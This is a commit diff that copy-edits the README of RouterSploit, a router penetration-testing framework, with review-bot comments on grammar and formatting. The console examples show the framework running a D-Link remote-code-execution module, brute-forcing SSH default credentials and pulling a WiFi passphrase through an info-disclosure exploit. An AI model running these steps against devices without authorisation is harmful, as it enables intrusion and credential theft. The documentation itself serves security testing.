Commit 56067d93 by lucyoa
parents a663c017 35e7cffe
......@@ -12,7 +12,7 @@ It consists of various modules that aids penetration testing operations:
- exploits - modules that take advantage of identified vulnerabilities
- creds - modules designed to test credentials against network services
- scanners - modules that check if target is vulnerable to any exploit
- scanners - modules that check if a target is vulnerable to any exploit
# Installation
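Review bot: The sentence carried in this hunk's header, "It consists of various modules that aids penetration testing operations:", still has a subject-verb disagreement ("modules that aids"). Since this change is a grammar pass over the same list, fix it here as well: "modules that aid penetration testing operations".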
......@@ -29,7 +29,7 @@ It consists of various modules that aids penetration testing operations:
git clone https://github.com/reverse-shell/routersploit
cd routersploit
./rsf.py
## Installation on Ubuntu 16.04
sudo apt-get install python-dev python-pip libncurses5-dev git
......@@ -55,14 +55,14 @@ It consists of various modules that aids penetration testing operations:
# Update
Update RouterSploit Framework often. Project is under heavy development and new modules are shipped almost everyday.
Update RouterSploit Framework often. The project is under heavy development and new modules are shipped almost every day.
cd routersploit
git pull
# Usage
root@kalidev:~/git/routersploit# ./rsf.py
root@kalidev:~/git/routersploit# ./rsf.py
______ _ _____ _ _ _
| ___ \ | | / ___| | | (_) |
| |_/ /___ _ _| |_ ___ _ __\ `--. _ __ | | ___ _| |_
......@@ -76,7 +76,7 @@ Update RouterSploit Framework often. Project is under heavy development and new
Codename : Wildest Dreams
Version : 1.0.0
rsf >
rsf >
## 1. Exploits
......@@ -85,7 +85,7 @@ Update RouterSploit Framework often. Project is under heavy development and new
rsf > use exploits/
exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/
rsf > use exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >
rsf (D-LINK DIR-300 & DIR-600 RCE) >
You can use the tab key for completion.
......@@ -110,7 +110,7 @@ Set options:
### Run module
Exploiting target can be achieved by issuing 'run' or 'exploit' command:
You can exploit the target by issuing the 'run' or 'exploit' command:
rsf (D-LINK DIR-300 & DIR-600 RCE) > run
[+] Target is vulnerable
......@@ -152,9 +152,9 @@ Display information about exploit:
### Pick module
Modules located under creds/ directory allow running dictionary attacks against various network services.
Modules located in the `creds/` directory allow running dictionary attacks against various network services.
Following services are currently supported:
The following services are currently supported:
- ftp
- ssh
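Review bot: Formatting of literals is inconsistent after this hunk. The added line wraps `creds/` in backticks, while the Run module section added earlier in this change keeps single quotes for 'run' and 'exploit', and the service names in the list below are left bare. Pick one convention for commands, paths and module names (backticks would match this line) and apply it across the README.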
......@@ -165,8 +165,8 @@ Following services are currently supported:
Every service has been divided into two modules:
- default (e.g. ssh_default) - this kind of modules use one wordlist with default credentials pairs login:password. Module can be quickly used and in matter of seconds verify if the device uses default credentials.
- bruteforce (e.g. ssh_bruteforce) - this kind of modules perform dictionary attacks against specified account or list of accounts. It takes two parameters login and password. These values can be a single word (e.g. 'admin') or entire list of strings (file:///root/users.txt).
- default (e.g. ssh_default) - this kind of modules use one wordlist with default credentials pairs login:password. The module can be quickly used and in matter of seconds can verify if the device uses default credentials.
- bruteforce (e.g. ssh_bruteforce) - this kind of modules perform dictionary attacks against a specified account or list of accounts. It takes two parameters: login and password. These values can be a single word (e.g. 'admin') or an entire list of strings (file:///root/users.txt).
Console:
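Review bot: Both rewritten bullets still read "this kind of modules use" and "this kind of modules perform", and the first still has "in matter of seconds" and "default credentials pairs". Suggest "this kind of module uses one wordlist of default login:password pairs" and "in a matter of seconds", with the matching singular verb in the bruteforce bullet. It would also help to mark `file:///root/users.txt` as an example path so readers do not take it for a file the framework ships.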
......@@ -174,22 +174,22 @@ Console:
creds/ftp_bruteforce creds/http_basic_bruteforce creds/http_form_bruteforce creds/snmp_bruteforce creds/ssh_default creds/telnet_default
creds/ftp_default creds/http_basic_default creds/http_form_default creds/ssh_bruteforce creds/telnet_bruteforce
rsf > use creds/ssh_default
rsf (SSH Default Creds) >
rsf (SSH Default Creds) >
### Options
rsf (SSH Default Creds) > show options
Target options:
Name Current settings Description
---- ---------------- -----------
target Target IP address
port 22 Target port
Module options:
Name Current settings Description
---- ---------------- -----------
threads 8 Numbers of threads
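Review bot: The removed and added prompt lines in this hunk ("rsf (SSH Default Creds) >") read identically, so the change here appears to be whitespace only inside a console transcript. If that is trailing-whitespace cleanup, consider moving it to its own commit so the wording fixes in the rest of the change are easier to review.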
......@@ -220,21 +220,21 @@ Set target:
[-] worker-7 Authentication failed. Username: 'ADVMAIL' Password: 'HP'
[-] worker-3 Authentication failed. Username: '266344' Password: '266344'
[-] worker-2 Authentication failed. Username: '1502' Password: '1502'
(..)
Elapsed time: 38.9181981087 seconds
[+] Credentials found!
Login Password
----- --------
admin 1234
rsf (SSH Default Creds) >
rsf (SSH Default Creds) >
## 3. Scanners
Scanners allow quickly verify if the target is vulnerable to any exploits.
Scanners allow you to quickly verify if the target is vulnerable to any exploits.
### Pick module
......@@ -245,7 +245,7 @@ Scanners allow quickly verify if the target is vulnerable to any exploits.
### Options
Target options:
Name Current settings Description
---- ---------------- -----------
target Target address e.g. http://192.168.1.1
......@@ -266,11 +266,11 @@ Set target:
[-] exploits/dlink/dir_645_password_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_615_info_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_rce is not vulnerable
[+] Device is vulnerable!
- exploits/dlink/dwr_932_info_disclosure
It has been verified that target is vulnerable to dwr\_932\_info\_disclosure exploit. Now use proper module and exploit target.
It has been verified that the target is vulnerable to dwr\_932\_info\_disclosure exploit. Now use the proper module and exploit target.
rsf (D-Link Scanner) > use exploits/dlink/dwr_932_info_disclosure
rsf (D-Link DWR-932 Info Disclosure) > set target 192.168.1.1
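Review bot: The rewritten sentence still drops two articles: "vulnerable to dwr\_932\_info\_disclosure exploit" and "exploit target". Suggest "vulnerable to the dwr_932_info_disclosure exploit. Now use the proper module and exploit the target." Putting the module name in backticks would also remove the need for the escaped underscores.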
......@@ -279,7 +279,7 @@ It has been verified that target is vulnerable to dwr\_932\_info\_disclosure exp
[*] Running module...
[*] Decoding JSON value
[+] Exploit success
Parameter Value
--------- -----
get_wps_enable 0
......@@ -292,9 +292,8 @@ It has been verified that target is vulnerable to dwr\_932\_info\_disclosure exp
get_mac_filter_switch 0
wifi_AP1_passphrase MyPaSsPhRaSe
get_wps_mode 0
# License
License has been taken from BSD licensing and applied to RouterSploit Framework.
Please see LICENSE for more details.
# License
The RouterSploit Framework is under a BSD license.
Please see [LICENSE](LICENSE) for more details.
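Review bot: The new License text says "a BSD license" without naming which variant applies. State the exact variant given in the LICENSE file so readers do not have to open it to learn the terms. The link target `LICENSE` is relative, so check that it resolves wherever this README is rendered.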